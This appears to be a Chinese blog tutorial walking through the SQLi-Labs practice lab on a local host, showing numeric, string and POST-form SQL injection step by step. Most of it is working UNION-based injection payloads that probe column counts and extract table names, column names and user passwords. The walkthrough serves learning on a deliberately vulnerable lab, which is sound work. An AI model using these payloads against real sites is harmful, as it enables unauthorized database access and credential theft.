sql-labs数字型、字符型注入

访问SQLi-Labs网站


一、数字型注入

1、访问less-2

访问后根据提示先给定一个GET参数

http://127.0.0.1/bc/sqli-labs/Less-2/?id=1

此时页面显示id=1的用户名和密码
在这里插入图片描述

2、寻找注入点、判断注入类型

http://127.0.0.1/bc/sqli-labs/Less-2/?id=1’ >> 运行后报错

在这里插入图片描述

http://127.0.0.1/bc/sqli-labs/Less-2/?id=1 and 1=1 >> 运行后正常显示

在这里插入图片描述

http://127.0.0.1/bc/sqli-labs/Less-2/?id=1 and 1=2 >>运行后未正常显示

在这里插入图片描述

由以上可以判断,存在数字型注入

3、判断网站查询的列数

尝试使用 order by
http://127.0.0.1/bc/sqli-labs/Less-2/?id=1 order by 1–+ >>正常显示
http://127.0.0.1/bc/sqli-labs/Less-2/?id=1 order by 2–+ >>正常显示
http://127.0.0.1/bc/sqli-labs/Less-2/?id=1 order by 3–+ >>正常显示
在这里插入图片描述
http://127.0.0.1/bc/sqli-labs/Less-2/?id=1 order by 4–+ >>报错
在这里插入图片描述
由以上可以判断,网站查询字段数为3

4、判断网站回显位

利用union select 判断
http://127.0.0.1/bc/sqli-labs/Less-2/?id=1 and 1=2 union select 1,2,3–+
在这里插入图片描述
可以看到2号和3号可以回显
后面,可以再2号或3号位设置一些具有特殊功能的函数或命令来执行sql注入

5、获取网站所在数据库名

http://127.0.0.1/bc/sqli-labs/Less-2/?id=1 and 1=2 union select 1,2,database()–+
在这里插入图片描述

6、获取数据库security的全部表名

http://127.0.0.1/bc/sqli-labs/Less-2/?id=1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’–+
在这里插入图片描述
7、获取users表的全部列名
http://127.0.0.1/bc/sqli-labs/Less-2/?id=1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’–+
在这里插入图片描述
8、获取users表id、username和password的值
http://127.0.0.1/bc/sqli-labs/Less-2/?id=1 and 1=2 union select 1,2,concat_ws(’~’,id,username,password) from security.users limit 0,1–+
在这里插入图片描述
由于users表中存放着多组数据,我们可以通过limit M,N 的方式逐条显示

二、字符型注入

1、访问 less-1

http://127.0.0.1/bc/sqli-labs/Less-1/
在这里插入图片描述

2、寻找注入点

http://127.0.0.1/bc/sqli-labs/Less-1/?id=1’ >>运行报错
在这里插入图片描述
http://127.0.0.1/bc/sqli-labs/Less-1/?id=1’ and ‘1’=‘1 >>运行后正常显示
在这里插入图片描述
http://127.0.0.1/bc/sqli-labs/Less-1/?id=1’ and ‘1’='2 >>运行后未正常显示
在这里插入图片描述
由此可以判断存在字符型注入

3、判断网站列数

http://127.0.0.1/bc/sqli-labs/Less-2/?id=1’ order by 1–+ >>正常显示
http://127.0.0.1/bc/sqli-labs/Less-2/?id=1‘ order by 2–+ >>正常显示
http://127.0.0.1/bc/sqli-labs/Less-2/?id=1’ order by 3–+ >>正常显示
在这里插入图片描述
http://127.0.0.1/bc/sqli-labs/Less-1/?id=1’ order by 4–+ >>报错
在这里插入图片描述网站查询字段数为3

4、判断网站回显位

http://127.0.0.1/bc/sqli-labs/Less-1/?id=1’ and 1=2 union select 1,2,3–+
在这里插入图片描述
2号3号可以回显

5、获取当前所在数据库名

http://127.0.0.1/bc/sqli-labs/Less-1/?id=1’ and 1=2 union select 1,2,database()–+
在这里插入图片描述

6、获取数据库security的全部表名

http://127.0.0.1/bc/sqli-labs/Less-1/?id=1’ and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’–+
在这里插入图片描述

7、获取users表的全部列名

http://127.0.0.1/bc/sqli-labs/Less-1/?id=1’ and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’–+
在这里插入图片描述

8、获取users表id、username和password列的全部值

http://127.0.0.1/bc/sqli-labs/Less-1/?id=1’ and 1=2 union select 1,2,concat_ws(’~’,id,username,password)from security.users limit 0,1 --+
在这里插入图片描述

三、POST注入

1、访问less-11

http://127.0.0.1/bc/sqli-labs/Less-11/
在这里插入图片描述

2、利用burp suite工具抓包

在浏览器访问less-11登录界面,输入用户名admin,密码任意,点击submit按钮
在这里插入图片描述
将获取的数据包发送到repeater选项卡下
在这里插入图片描述

3、寻找注入点

在POST表单处,使用payload判断
uname=amdin’&passwd=123&submit=Submit >>报错
在这里插入图片描述
uname=admin’#&passwd=123&submit=Submit 回显正常用户名和密码
在这里插入图片描述

4、判断列数

uname=admin’order by 1#&passwd=123&submit=Submit
uname=admin’order by 2#&passwd=123&submit=Submit
正常回显
在这里插入图片描述
uname=admin’order by 3#&passwd=123&submit=Submit
报错
在这里插入图片描述
可以判断,网站查询字段数为2

5、判断网站回显位置

uname=admin’and 1=2 union select 1,2#&passwd=123&submit=Submit
在这里插入图片描述
1号和2号都能回显

6、获取网站当前所在数据库名

uname=admin’and 1=2 union select 1,database()#&passwd=123&submit=Submit
在这里插入图片描述

7、获取数据库security的全部表名

uname=admin’and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘security’#&passwd=123&submit=Submit
在这里插入图片描述

8、获取users表的全部列名

uname=admin’and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’#&passwd=123&submit=Submit
在这里插入图片描述

9、获取users表id、username和password列的所有值

uname=admin’and 1=2 union select 1,concat_ws(’~’,id,username,password) from security.users limit 0,1#&passwd=123&submit=Submit
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值